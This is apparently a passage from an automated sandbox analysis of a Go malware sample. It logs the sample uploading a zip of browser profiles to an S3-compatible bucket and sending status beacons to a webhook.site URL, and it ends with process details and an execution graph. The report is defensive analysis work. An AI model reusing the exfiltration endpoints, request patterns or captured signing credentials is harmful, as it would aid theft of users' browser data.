          2024-08-20 16:25:05 UTC10674OUTData Raw: 74 c6 01 d2 35 e9 17 34 05 91 fb 53 fc 66 b4 3e ee 03 8b ca e2 26 17 d7 a4 3e bf 74 4b 3a 8d d4 a4 45 8b 55 7e 44 81 ab b6 ae 0a eb 43 dd f3 54 9e 23 d0 1a 23 57 dc 46 9b 73 a5 fe 18 2e 47 e5 aa 54 fd 32 4f 65 4d 06 94 56 5e 0f 9e dd 9f 87 e9 cd 94 ce 6a 1a 91 39 04 39 be 2d 26 b9 46 60 79 8d e0 e1 9a 66 31 d6 14 1d 93 97 19 22 17 e3 0c 6d 5d f8 8a 31 f3 30 a5 33 9a cd 63 71 4d 74 d2 ff d8 07 44 dc 09 57 a5 6e 5a b6 3d 03 b1 b7 e5 6a 94 38 62 5b 60 2c f3 2e 72 dc ad 5c 96 58 a7 d9 f8 b1 f2 32 a6 d9 b6 8b 68 dc f2 12 c3 77 4d 9a ca 8d 19 cb 11 e6 46 b4 e5 14 4d c3 f9 c5 d5 f1 90 f8 cc 7e cc 7b 39 ab 39 4a 18 fe 32 9f e3 ac 66 53 cf ed 28 f2 40 5a 9c c8 dc 98 3a 4f d7 8c ed 43 30 b3 d1 88 5e 73 9c d2 e9 8d d1 4d 88 e1 ad 7f e4 b3 43 12 fb ea d4 0f 2d dd 9a
          Data Ascii: t54Sf>&>tK:EU~DCT##WFs.GT2OeMV^j99-&F`yf1"m]103cqMtDWnZ=j8b[`,.r\X2hwMFM~{99J2fS(@Z:OC0^sMC-
          2024-08-20 16:25:05 UTC11860OUTData Raw: d7 db be 48 f7 0b 05 e1 ee 67 0a 42 5d 75 be 70 e7 6d de 40 67 c4 19 ea 8b 1f f3 b3 e3 c6 fe ec bf 2f 7f 5f fe be fc 7d f9 bf b0 64 e3 63 b7 fc 4e e3 aa b8 e4 77 9b fe b7 b4 5c 85 cf d4 8b f7 db 62 17 e7 43 73 a6 fa 1f 4e cc 5d fc f0 bc 0f fb cb e2 bf b2 e4 e1 f8 1a ff 86 f8 1f fa 37 c4 1f 0a 94 c5 ff c6 bf 21 e1 8c 7f 43 e2 39 7f 59 22 09 3e 7c 03 dc f0 a3 9f c1 55 f5 14 c6 d7 0f 0f 5c dd 60 9e 1d 57 6f bc 3e ae de d8 7f 75 bd f1 e4 b8 7a a3 62 dc 73 c6 1d 57 d7 9b eb e2 5a 68 4e dc 7f d1 29 63 7d 26 be ef f5 ae cf df fe 7d f9 1f 2d 8c 73 f1 1c b9 5a d6 c7 7d 20 f0 d0 9c 94 a2 87 13 3e e6 7f 38 fe fb fe 0d 89 f5 fe b2 84 36 7f 79 c2 45 7f 59 02 0d 55 27 d2 f0 c6 24 ac 83 95 89 34 50 91 48 03 1b 12 28 1b 2b 2a 4b 82 e0 43 d7 82 a7 6e 15 8c 7f ee 02 8c 6b
          Data Ascii: HgB]upm@g/_}dcNw\bCsN]7!C9Y">|U\`Wo>uzbsWZhN)c}&}-sZ} >86yEYU'$4PH(+*KCnk
          2024-08-20 16:25:05 UTC10234OUTData Raw: 07 5d 07 d8 df 09 f6 03 a9 ee 1b 07 e7 c3 5e ba 6b f0 9d 79 95 ad bc ff 03 91 54 78 5e 79 cd 6b f9 6b 9d c4 eb cc 58 7f 6d 92 55 a8 f3 35 56 75 8e fb 98 fb 5e a4 8f 99 f8 98 42 bd 56 e0 80 66 4e 12 7b 2c c6 09 71 0f 6e f8 df 42 80 07 32 02 80 e7 7f 10 bd 73 05 90 ef e9 60 fc 31 3e 9c 03 c4 78 3b 87 f7 e1 3a c3 9e 68 85 4c 75 83 e1 ec 43 34 42 c2 ba 41 eb 39 94 3b 4a bf c8 8d 2c 49 f6 39 8d 90 77 8e fc f9 88 ed c6 75 63 f6 5b 31 6e 2e 8c ed c8 54 13 18 b9 c3 4c 2c 81 96 54 f7 09 17 cc c0 8d 03 10 8f 2b 3c 48 35 c3 f8 14 0b 18 b5 d7 0b 46 2e 9e 02 fd 6c 65 40 3f 88 6a 3d c5 3e 1f ea 58 dd 30 28 1f 0e b0 e4 83 b8 27 8a 90 24 d1 94 88 7e e4 8f be 37 02 25 17 ba b5 72 24 3d 3f 61 ec 18 06 1a d3 60 a0 e2 50 2b f0 82 cf 51 fa 12 b5 fc a8 15 fc bd d6 8d 4f b5 c2
          Data Ascii: ]^kyTx^ykkXmU5Vu^BVfN{,qnB2s`1>x;:hLuC4BA9;J,I9wuc[1n.TL,T+<H5F.le@?j=>X0('$~7%r$=?a`P+QO
          2024-08-20 16:25:06 UTC422INHTTP/1.1 200 OK
          Connection: close
          Date: Tue, 20 Aug 2024 16:25:06 GMT
          ETag: "9f592d982cd20d251da66c3f6405af9a"
          Server: WasabiS3/7.20.2957-2024-08-05-c5ee44c55d (head3)
          x-amz-id-2: OGNxhUMGbYyShh7r1QaSPIdklsTBprxE4yok53SCdH+Av3CjD4z7uWB7z9w/WgWaeeVlxwVlVhS4
          x-amz-request-id: 2B0A45AD30E509C0:A
          x-wasabi-cm-reference-id: 1724171104534 154.18.200.103 ConID:169041889/EngineConID:1622803/Core:13
          Content-Length: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          5192.168.2.749719154.18.200.1034432644C:\Users\user\Desktop\file.exe
          TimestampBytes transferredDirectionData
          2024-08-20 16:25:07 UTC736OUTPOST /browser-profiles/20240820122501-19882742-CC56-1A59-9779-FB8CBFA1E29D.zip?uploadId=bt24kn_zTbcHV6WZ2wBelxuQuTB6bMyvqDG8ICCHDMuT8Ws51JiOVQZ1BkDAFBiKM2iS4oGmGpChjjt6JN_wIds5sVNMf_XCqt7VRODSc28icvta8mfCv1iVnXr_-TlR HTTP/1.1
          Host: s3.ap-southeast-1.wasabisys.com
          User-Agent: aws-sdk-go/1.55.5 (go1.22.6; windows; amd64)
          Content-Length: 193
          Authorization: AWS4-HMAC-SHA256 Credential=28JW7MUJ64BNM9GCHFBF/20240820/ap-southeast-1/s3/aws4_request, SignedHeaders=content-length;host;x-amz-content-sha256;x-amz-date, Signature=a858111490a15e8bc0ef11751c8745b5ff47d929aef5a1050a079990c8107668
          X-Amz-Content-Sha256: 5bafa6c23c06555096574499bb7cf6bff9cbd5768157d8e052c47a9d96d8a2ba
          X-Amz-Date: 20240820T162505Z
          Accept-Encoding: gzip
          2024-08-20 16:25:07 UTC193OUTData Raw: 3c 43 6f 6d 70 6c 65 74 65 4d 75 6c 74 69 70 61 72 74 55 70 6c 6f 61 64 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 64 6f 63 2f 32 30 30 36 2d 30 33 2d 30 31 2f 22 3e 3c 50 61 72 74 3e 3c 45 54 61 67 3e 26 23 33 34 3b 39 66 35 39 32 64 39 38 32 63 64 32 30 64 32 35 31 64 61 36 36 63 33 66 36 34 30 35 61 66 39 61 26 23 33 34 3b 3c 2f 45 54 61 67 3e 3c 50 61 72 74 4e 75 6d 62 65 72 3e 31 3c 2f 50 61 72 74 4e 75 6d 62 65 72 3e 3c 2f 50 61 72 74 3e 3c 2f 43 6f 6d 70 6c 65 74 65 4d 75 6c 74 69 70 61 72 74 55 70 6c 6f 61 64 3e
          Data Ascii: <CompleteMultipartUpload xmlns="http://s3.amazonaws.com/doc/2006-03-01/"><Part><ETag>&#34;9f592d982cd20d251da66c3f6405af9a&#34;</ETag><PartNumber>1</PartNumber></Part></CompleteMultipartUpload>
          2024-08-20 16:25:08 UTC419INHTTP/1.1 200 OK
          Connection: close
          Content-Type: application/xml
          Date: Tue, 20 Aug 2024 16:25:08 GMT
          Server: WasabiS3/7.20.2957-2024-08-05-c5ee44c55d (head4)
          x-amz-id-2: Qh+azevpSgmEyoaS40hdRx07qqbYqzAIHJPLgv/bGKb4n0gtyOTW25pcIeB9eZX1cPzIVmBGrN9M
          x-amz-request-id: 23FE50A1BFDAB7E7:B
          x-wasabi-cm-reference-id: 1724171107274 154.18.200.103 ConID:169042597/EngineConID:1627634/Core:3
          Transfer-Encoding: chunked
          2024-08-20 16:25:08 UTC453INData Raw: 31 62 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 43 6f 6d 70 6c 65 74 65 4d 75 6c 74 69 70 61 72 74 55 70 6c 6f 61 64 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 64 6f 63 2f 32 30 30 36 2d 30 33 2d 30 31 2f 22 3e 3c 4c 6f 63 61 74 69 6f 6e 3e 68 74 74 70 73 3a 2f 2f 73 33 2e 61 70 2d 73 6f 75 74 68 65 61 73 74 2d 31 2e 77 61 73 61 62 69 73 79 73 2e 63 6f 6d 2f 62 72 6f 77 73 65 72 2d 70 72 6f 66 69 6c 65 73 2f 32 30 32 34 30 38 32 30 31 32 32 35 30 31 2d 31 39 38 38 32 37 34 32 2d 43 43 35 36 2d 31 41 35 39 2d 39 37 37 39 2d 46 42 38 43 42 46 41 31 45 32 39 44 2e 7a 69 70 3c 2f 4c 6f 63 61 74 69 6f 6e
          Data Ascii: 1b9<?xml version="1.0" encoding="UTF-8"?><CompleteMultipartUploadResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/"><Location>https://s3.ap-southeast-1.wasabisys.com/browser-profiles/20240820122501-19882742-CC56-1A59-9779-FB8CBFA1E29D.zip</Location


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          6192.168.2.74972246.4.105.1164432644C:\Users\user\Desktop\file.exe
          TimestampBytes transferredDirectionData
          2024-08-20 16:25:09 UTC183OUTPOST /efe6628a-60cc-4d7a-bd08-479e31e08de5 HTTP/1.1
          Host: webhook.site
          User-Agent: Go-http-client/1.1
          Content-Length: 294
          Content-Type: application/json
          Accept-Encoding: gzip
          2024-08-20 16:25:09 UTC294OUTData Raw: 7b 22 64 65 76 69 63 65 5f 69 64 22 3a 22 31 39 38 38 32 37 34 32 2d 43 43 35 36 2d 31 41 35 39 2d 39 37 37 39 2d 46 42 38 43 42 46 41 31 45 32 39 44 22 2c 22 65 72 72 6f 72 22 3a 22 22 2c 22 6f 73 5f 76 65 72 73 69 6f 6e 22 3a 22 57 69 6e 64 6f 77 73 20 31 30 20 31 30 2e 30 2e 31 39 30 34 35 22 2c 22 73 65 73 73 69 6f 6e 5f 69 64 22 3a 22 38 64 39 65 37 64 65 63 2d 31 39 37 37 2d 34 65 34 39 2d 62 33 39 37 2d 37 34 66 39 35 64 65 35 39 31 64 32 22 2c 22 73 74 61 74 65 22 3a 22 55 70 6c 6f 61 64 69 6e 67 20 66 69 6c 65 73 20 63 6f 6d 70 6c 65 74 65 64 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 32 34 31 37 31 31 30 37 2c 22 75 73 65 72 5f 64 61 74 61 5f 70 61 74 68 22 3a 22 43 3a 5c 5c 55 73 65 72 73 5c 5c 66 72 6f 6e 74 64 65 73 6b 5c 5c 41 70 70 44
          Data Ascii: {"device_id":"19882742-CC56-1A59-9779-FB8CBFA1E29D","error":"","os_version":"Windows 10 10.0.19045","session_id":"8d9e7dec-1977-4e49-b397-74f95de591d2","state":"Uploading files completed","timestamp":1724171107,"user_data_path":"C:\\Users\\user\\AppD
          2024-08-20 16:25:10 UTC317INHTTP/1.1 200 OK
          Server: nginx
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          X-Request-Id: 4210119a-80a2-42b7-83b0-78687cf9294c
          X-Token-Id: efe6628a-60cc-4d7a-bd08-479e31e08de5
          Cache-Control: no-cache, private
          Date: Tue, 20 Aug 2024 16:25:09 GMT
          2024-08-20 16:25:10 UTC156INData Raw: 39 31 0d 0a 54 68 69 73 20 55 52 4c 20 68 61 73 20 6e 6f 20 64 65 66 61 75 6c 74 20 63 6f 6e 74 65 6e 74 20 63 6f 6e 66 69 67 75 72 65 64 2e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 68 6f 6f 6b 2e 73 69 74 65 2f 23 21 2f 76 69 65 77 2f 65 66 65 36 36 32 38 61 2d 36 30 63 63 2d 34 64 37 61 2d 62 64 30 38 2d 34 37 39 65 33 31 65 30 38 64 65 35 22 3e 56 69 65 77 20 69 6e 20 57 65 62 68 6f 6f 6b 2e 73 69 74 65 3c 2f 61 3e 2e 0d 0a 30 0d 0a 0d 0a
          Data Ascii: 91This URL has no default content configured. <a href="https://webhook.site/#!/view/efe6628a-60cc-4d7a-bd08-479e31e08de5">View in Webhook.site</a>.0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          7192.168.2.74972846.4.105.1164432644C:\Users\user\Desktop\file.exe
          TimestampBytes transferredDirectionData
          2024-08-20 16:25:12 UTC183OUTPOST /efe6628a-60cc-4d7a-bd08-479e31e08de5 HTTP/1.1
          Host: webhook.site
          User-Agent: Go-http-client/1.1
          Content-Length: 285
          Content-Type: application/json
          Accept-Encoding: gzip
          2024-08-20 16:25:12 UTC285OUTData Raw: 7b 22 64 65 76 69 63 65 5f 69 64 22 3a 22 31 39 38 38 32 37 34 32 2d 43 43 35 36 2d 31 41 35 39 2d 39 37 37 39 2d 46 42 38 43 42 46 41 31 45 32 39 44 22 2c 22 65 72 72 6f 72 22 3a 22 22 2c 22 6f 73 5f 76 65 72 73 69 6f 6e 22 3a 22 57 69 6e 64 6f 77 73 20 31 30 20 31 30 2e 30 2e 31 39 30 34 35 22 2c 22 73 65 73 73 69 6f 6e 5f 69 64 22 3a 22 38 64 39 65 37 64 65 63 2d 31 39 37 37 2d 34 65 34 39 2d 62 33 39 37 2d 37 34 66 39 35 64 65 35 39 31 64 32 22 2c 22 73 74 61 74 65 22 3a 22 53 63 72 69 70 74 20 63 6f 6d 70 6c 65 74 65 64 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 32 34 31 37 31 31 31 30 2c 22 75 73 65 72 5f 64 61 74 61 5f 70 61 74 68 22 3a 22 43 3a 5c 5c 55 73 65 72 73 5c 5c 66 72 6f 6e 74 64 65 73 6b 5c 5c 41 70 70 44 61 74 61 5c 5c 4c 6f 63 61
          Data Ascii: {"device_id":"19882742-CC56-1A59-9779-FB8CBFA1E29D","error":"","os_version":"Windows 10 10.0.19045","session_id":"8d9e7dec-1977-4e49-b397-74f95de591d2","state":"Script completed","timestamp":1724171110,"user_data_path":"C:\\Users\\user\\AppData\\Loca
          2024-08-20 16:25:13 UTC317INHTTP/1.1 200 OK
          Server: nginx
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          X-Request-Id: 69c88ed4-f071-4581-bae0-e05229b0774b
          X-Token-Id: efe6628a-60cc-4d7a-bd08-479e31e08de5
          Cache-Control: no-cache, private
          Date: Tue, 20 Aug 2024 16:25:13 GMT
          2024-08-20 16:25:13 UTC156INData Raw: 39 31 0d 0a 54 68 69 73 20 55 52 4c 20 68 61 73 20 6e 6f 20 64 65 66 61 75 6c 74 20 63 6f 6e 74 65 6e 74 20 63 6f 6e 66 69 67 75 72 65 64 2e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 68 6f 6f 6b 2e 73 69 74 65 2f 23 21 2f 76 69 65 77 2f 65 66 65 36 36 32 38 61 2d 36 30 63 63 2d 34 64 37 61 2d 62 64 30 38 2d 34 37 39 65 33 31 65 30 38 64 65 35 22 3e 56 69 65 77 20 69 6e 20 57 65 62 68 6f 6f 6b 2e 73 69 74 65 3c 2f 61 3e 2e 0d 0a 30 0d 0a 0d 0a
          Data Ascii: 91This URL has no default content configured. <a href="https://webhook.site/#!/view/efe6628a-60cc-4d7a-bd08-479e31e08de5">View in Webhook.site</a>.0


          Statistics

          CPU Usage

          Click to jump to process

          Memory Usage

          Click to jump to process

          High Level Behavior Distribution

          Click to dive into process behavior distribution

          System Behavior

          General

          Target ID:2
          Start time:12:24:52
          Start date:20/08/2024
          Path:C:\Users\user\Desktop\file.exe
          Wow64 process (32bit):false
          Commandline:"C:\Users\user\Desktop\file.exe"
          Imagebase:0x6a0000
          File size:17'171'948 bytes
          MD5 hash:1F6C6F36D126CD027DED1915E321C693
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:Go lang
          Reputation:low
          Has exited:true

          Disassembly

          Reset < >

            Execution Graph

            Execution Coverage:1.3%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:24.9%
            Total number of Nodes:1053
            Total number of Limit Nodes:84
            execution_graph 45474 70a9c0 45475 70a9f4 45474->45475 45476 70a9ef 45474->45476 45483 6e3a20 45475->45483 45497 6dcb80 CreateFileW 45476->45497 45484 6e3a2a 45483->45484 45484->45483 45523 6de100 CreateFileW 45484->45523 45486 6e3a78 45491 6e3aa5 45486->45491 45524 6fc140 CreateFileW 45486->45524 45488 6e3c07 45509 6e3580 45488->45509 45491->45488 45525 6de100 CreateFileW 45491->45525 45493 6e3b9d 45494 6e3bbb 45493->45494 45526 6fc280 CreateFileW 45493->45526 45499 6e1640 45494->45499 45498 6dcbc0 CreateFileW 45500 6e164a 45499->45500 45500->45499 45502 6e1679 45500->45502 45527 6d1860 CreateFileW 45500->45527 45528 6de100 CreateFileW 45502->45528 45504 6e16db 45506 6e1733 45504->45506 45529 6d7080 CreateFileW 45504->45529 45507 6e1765 45506->45507 45530 6fbe40 CreateFileW 45506->45530 45507->45488 45522 6e358a 45509->45522 45512 6e1640 CreateFileW 45512->45522 45513 6d9780 CreateFileW 45513->45522 45515 6ac9c0 CreateFileW 45515->45522 45517 6e37b7 45518 6e1640 CreateFileW 45517->45518 45520 6e37bc 45518->45520 45520->45498 45521 6acc20 CreateFileW 45521->45522 45522->45509 45522->45512 45522->45513 45522->45515 45522->45517 45522->45521 45531 6e1220 45522->45531 45547 6e1800 45522->45547 45615 6e31c0 45522->45615 45621 6e14a0 CreateFileW 45522->45621 45622 6e10e0 45522->45622 45523->45486 45524->45491 45525->45493 45526->45494 45527->45502 45528->45504 45529->45506 45530->45507 45544 6e122a 45531->45544 45536 6e12ca 45690 6e7900 45536->45690 45539 6dbaa0 CreateFileW 45539->45544 45540 6dba20 CreateFileW 45540->45544 45541 6db7e0 CreateFileW 45541->45544 45542 6db460 CreateFileW 45542->45544 45543 6db220 CreateFileW 45543->45544 45544->45531 45544->45536 45544->45539 45544->45540 45544->45541 45544->45542 45544->45543 45545 6db280 CreateFileW 45544->45545 45546 6d9780 CreateFileW 45544->45546 45636 6e7b60 45544->45636 45642 6e0d80 45544->45642 45688 6e7d40 CreateFileW 45544->45688 45689 6acda0 CreateFileW 45544->45689 45545->45544 45546->45544 45584 6e1812 45547->45584 45552 6e21f5 46260 6de100 CreateFileW 45552->46260 45554 70c640 CreateFileW 45554->45584 45556 6e223b 45557 6e225c 45556->45557 46261 6fc280 CreateFileW 45556->46261 45557->45522 45559 6d4620 CreateFileW 45559->45584 45560 6e22f9 46262 6e3240 CreateFileW 45560->46262 45561 6e21d8 45561->45522 45565 6e2328 46263 6de100 CreateFileW 45565->46263 45567 6e26f8 46273 6e9600 CreateFileW 45567->46273 45569 6e2378 45571 6e239c 45569->45571 46264 6fc280 CreateFileW 45569->46264 45571->45522 45572 6e26ff 46274 6acc20 CreateFileW 45572->46274 45573 6e27d6 46276 6de100 CreateFileW 45573->46276 45577 6e282e 45581 6e284f 45577->45581 46277 6fc280 CreateFileW 45577->46277 45578 6e2715 45578->45522 45579 6acc20 CreateFileW 45579->45584 45580 6e7b60 CreateFileW 45580->45584 45581->45522 45584->45547 45584->45552 45584->45554 45584->45559 45584->45560 45584->45561 45584->45567 45584->45573 45584->45579 45584->45580 45586 6d9780 CreateFileW 45584->45586 45588 6e0960 CreateFileW 45584->45588 45589 6e9600 CreateFileW 45584->45589 45592 6e2693 45584->45592 45593 6e7900 CreateFileW 45584->45593 45595 6e256c 45584->45595 45601 6ac9c0 CreateFileW 45584->45601 45608 6e240b 45584->45608 46248 6df980 CreateFileW 45584->46248 46249 6e3820 CreateFileW 45584->46249 46250 6c2f80 CreateFileW 45584->46250 46251 6dd4a0 CreateFileW 45584->46251 46252 6e1540 CreateFileW 45584->46252 46253 6e29c0 CreateFileW 45584->46253 46254 6c3a60 CreateFileW 45584->46254 46255 6e9820 CreateFileW 45584->46255 46256 6e9b60 CreateFileW 45584->46256 46257 6e2dc0 CreateFileW 45584->46257 46258 6e2fa0 CreateFileW 45584->46258 46259 6e99c0 CreateFileW 45584->46259 46268 6e3240 CreateFileW 45584->46268 46269 6d4520 CreateFileW 45584->46269 46275 6c3b40 CreateFileW 45584->46275 45586->45584 45588->45584 45589->45584 46272 6acc20 CreateFileW 45592->46272 45593->45584 45597 6e7900 CreateFileW 45595->45597 45596 6e26a9 45598 6e7900 CreateFileW 45596->45598 45599 6e2585 45597->45599 45600 6e26b6 45598->45600 46270 6de100 CreateFileW 45599->46270 45600->45522 45601->45584 45604 6e2605 45605 6e2626 45604->45605 46271 6fc280 CreateFileW 45604->46271 45605->45522 46265 6e3240 CreateFileW 45608->46265 45610 6e2436 46266 6de100 CreateFileW 45610->46266 45612 6e2489 45613 6e24aa 45612->45613 46267 6fc280 CreateFileW 45612->46267 45613->45522 45616 6e31c6 45615->45616 45616->45615 45617 6e31f9 45616->45617 45619 6d9780 CreateFileW 45616->45619 45618 6e10e0 CreateFileW 45617->45618 45620 6e31fe 45618->45620 45619->45616 45620->45522 45621->45522 45626 6e10ea 45622->45626 45623 6e1115 45623->45522 45626->45622 45626->45623 45627 6e11a8 45626->45627 45628 6e1168 45626->45628 46278 6ac9c0 CreateFileW 45626->46278 46279 6e9b60 CreateFileW 45626->46279 46282 6d9780 CreateFileW 45626->46282 46281 6acc20 CreateFileW 45627->46281 46280 6acc20 CreateFileW 45628->46280 45632 6e11bb 45634 6e0aa0 CreateFileW 45632->45634 45633 6e1176 45633->45522 45635 6e11cc 45634->45635 45635->45522 45637 6e7b6a 45636->45637 45637->45636 45638 6e7ba5 45637->45638 45698 6fb5e0 CreateFileW 45637->45698 45699 6e7c00 CreateFileW 45638->45699 45641 6e7be5 45641->45544 45645 6e0d8a 45642->45645 45643 6e10ad 45700 6e0aa0 45643->45700 45645->45642 45645->45643 45647 6e0dd6 45645->45647 45646 6e10b6 45646->45544 45650 6e0e54 45647->45650 45657 6e0e45 45647->45657 45648 6e0ec2 45649 6e0f16 45648->45649 45651 6e0ef5 45648->45651 45721 6ac9c0 CreateFileW 45649->45721 45650->45648 45656 6e0eb3 45650->45656 45653 6e0aa0 CreateFileW 45651->45653 45658 6e0f10 45653->45658 45654 6e0f25 45655 6e0f2f 45654->45655 45667 6e0f6f 45654->45667 45659 6e0f5b 45655->45659 45722 6acd20 CreateFileW 45655->45722 45660 6e0aa0 CreateFileW 45656->45660 45661 6e0aa0 CreateFileW 45657->45661 45658->45544 45723 6acc20 CreateFileW 45659->45723 45664 6e0ebc 45660->45664 45665 6e0e4e 45661->45665 45664->45544 45665->45544 45666 6e0f69 45666->45544 45668 6e0fd1 45667->45668 45724 6acd20 CreateFileW 45667->45724 45669 6e108b 45668->45669 45670 6e0fe6 45668->45670 45729 6acc20 CreateFileW 45669->45729 45671 6e102b 45670->45671 45673 6e1005 45670->45673 45726 6e9820 CreateFileW 45671->45726 45725 6acc20 CreateFileW 45673->45725 45674 6e1099 45676 6e0aa0 CreateFileW 45674->45676 45680 6e10a7 45676->45680 45679 6e1013 45682 6e0aa0 CreateFileW 45679->45682 45680->45544 45681 6e1065 45727 6acc20 CreateFileW 45681->45727 45685 6e1025 45682->45685 45684 6e1073 45686 6e1085 45684->45686 45728 6e3160 CreateFileW 45684->45728 45685->45544 45686->45544 45688->45544 45689->45544 45691 6e790a 45690->45691 45691->45690 46086 6e79c0 CreateFileW 45691->46086 45693 6e791c 46072 6b7540 45693->46072 45695 6e12da 45695->45522 45696 6e792a 45696->45695 46087 6fb520 CreateFileW 45696->46087 45698->45638 45699->45641 45708 6e0aaa 45700->45708 45702 6e0bac 45746 6dd2c0 CreateFileW 45702->45746 45706 6e0bb1 45747 6acc20 CreateFileW 45706->45747 45707 6e0c44 45709 6e0c5b 45707->45709 45749 6acc20 CreateFileW 45707->45749 45708->45700 45708->45702 45708->45707 45712 6d9780 CreateFileW 45708->45712 45720 6e0ba5 45708->45720 45743 6ac9c0 CreateFileW 45708->45743 45744 6e99c0 CreateFileW 45708->45744 45745 6acc20 CreateFileW 45708->45745 45709->45646 45712->45708 45713 6e0bd1 45730 6e0500 45713->45730 45716 6e0bf8 45719 6e0c12 45716->45719 45748 6ac9c0 CreateFileW 45716->45748 45717 6e0ca9 45717->45646 45719->45646 45750 6acd20 CreateFileW 45720->45750 45721->45654 45722->45659 45723->45666 45724->45668 45725->45679 45726->45681 45727->45684 45728->45686 45729->45674 45735 6e050a 45730->45735 45732 6e0607 45774 6e0680 45732->45774 45734 6e060c 45734->45716 45735->45730 45735->45732 45737 6e0592 45735->45737 45751 6dfa20 45735->45751 45791 6ac9c0 CreateFileW 45735->45791 45794 6d9780 CreateFileW 45735->45794 45739 6e05c9 45737->45739 45792 6acd20 CreateFileW 45737->45792 45793 6acc20 CreateFileW 45739->45793 45742 6e05d7 45742->45716 45743->45708 45744->45708 45745->45708 45746->45706 45747->45713 45748->45719 45749->45709 45750->45717 45752 6dfa2a 45751->45752 45752->45751 45799 6ebdc0 CreateFileW 45752->45799 45754 6dfa4d 45755 6dfa7a 45754->45755 45756 6e7900 CreateFileW 45754->45756 45757 6dfaa5 45755->45757 45800 6ac9c0 CreateFileW 45755->45800 45756->45755 45795 6aec20 45757->45795 45760 6dfc92 45821 6acc20 CreateFileW 45760->45821 45761 6dfab1 45801 6dd320 CreateFileW 45761->45801 45763 6dfae5 45802 6e58c0 45763->45802 45767 6dfa92 45767->45760 45809 6fcac0 CreateFileW 45767->45809 45810 70aa40 45767->45810 45769 6dfaef 45770 6dfb55 45769->45770 45771 6e7b60 CreateFileW 45769->45771 45808 6ebee0 CreateFileW 45770->45808 45771->45770 45773 6dfb96 45773->45735 45777 6e068a 45774->45777 45775 6e0723 46048 6ebdc0 CreateFileW 45775->46048 45776 6e06bc 46038 6ebdc0 CreateFileW 45776->46038 45777->45774 45777->45775 45777->45776 46050 6d9780 CreateFileW 45777->46050 45780 6e0734 46024 6d6340 45780->46024 45782 6e06e5 46039 70c640 45782->46039 45786 6e06ff 46047 6ebee0 CreateFileW 45786->46047 45789 6e074a 45789->45734 45790 6e071d 45790->45734 45791->45735 45792->45739 45793->45742 45794->45735 45797 6aec26 45795->45797 45797->45795 45822 6ae200 45797->45822 45798 6aec45 45798->45761 45799->45754 45800->45767 45801->45763 45803 6e58ca 45802->45803 45803->45802 45804 6aec20 CreateFileW 45803->45804 45805 6e58e5 45804->45805 45806 70aa40 CreateFileW 45805->45806 45807 6e58f7 45805->45807 45806->45807 45807->45769 45808->45773 45809->45767 45811 70aa61 45810->45811 45813 70aabf 45810->45813 45811->45813 45857 703840 45811->45857 45861 6e5a60 45811->45861 45869 6c4920 45811->45869 45873 6c9e40 45811->45873 45879 6bc020 45811->45879 45883 6bc060 45811->45883 45891 6aefa0 45811->45891 45812 70aa89 45812->45767 45813->45767 45821->45757 45831 6ae20a 45822->45831 45824 6ae24b 45844 6aeee0 45824->45844 45828 6ae3d6 45828->45798 45831->45822 45831->45824 45831->45828 45832 6ae000 CreateFileW 45831->45832 45834 6ae969 45831->45834 45837 6d9780 CreateFileW 45831->45837 45840 6ae978 45831->45840 45848 6aeb00 CreateFileW 45831->45848 45849 6b7160 CreateFileW 45831->45849 45850 6b6ba0 CreateFileW 45831->45850 45851 6c22a0 CreateFileW 45831->45851 45852 6aed00 CreateFileW 45831->45852 45832->45831 45853 6aeb80 CreateFileW 45834->45853 45835 6aea14 45835->45798 45837->45831 45841 6ae9a6 45840->45841 45854 6d1f00 CreateFileW 45840->45854 45841->45835 45855 6bb400 CreateFileW 45841->45855 45842 6aea05 45842->45835 45856 6bb500 CreateFileW 45842->45856 45845 6aeee6 45844->45845 45845->45844 45846 70aa40 CreateFileW 45845->45846 45847 6ae299 45846->45847 45847->45798 45848->45831 45849->45831 45850->45831 45851->45831 45852->45831 45853->45840 45854->45841 45855->45842 45856->45835 45859 703846 45857->45859 45858 6e0500 CreateFileW 45860 703865 45858->45860 45859->45857 45859->45858 45860->45812 45862 6e5a66 45861->45862 45862->45861 45895 6e5ac0 45862->45895 45866 6e5a9a 45867 6e5aa8 45866->45867 45868 6e10e0 CreateFileW 45866->45868 45867->45812 45868->45867 45870 6c4926 45869->45870 45870->45869 45911 6c4b60 45870->45911 45872 6c494f 45872->45812 45874 6c9e46 45873->45874 45874->45873 45877 6c9e86 45874->45877 45971 6c95e0 CreateFileW 45874->45971 45937 6ca260 45877->45937 45878 6c9e9c 45878->45812 45880 6bc026 45879->45880 45880->45879 45972 6dea60 45880->45972 45884 6bc066 45883->45884 45884->45883 46000 6de540 CreateFileW 45884->46000 45886 6bc095 45986 6df560 45886->45986 45890 6bc0b3 45890->45812 45892 6aefa6 45891->45892 45892->45891 46002 6aefe0 45892->46002 45894 6aefc8 45894->45812 45900 6e5aca 45895->45900 45896 6d9860 CreateFileW 45896->45900 45897 6e63a0 CreateFileW 45897->45900 45898 6e58c0 CreateFileW 45898->45900 45899 6e5b6f 45904 6e5ee0 CreateFileW 45899->45904 45900->45895 45900->45896 45900->45897 45900->45898 45900->45899 45901 6d9780 CreateFileW 45900->45901 45902 6de100 CreateFileW 45900->45902 45903 6dcce0 CreateFileW 45900->45903 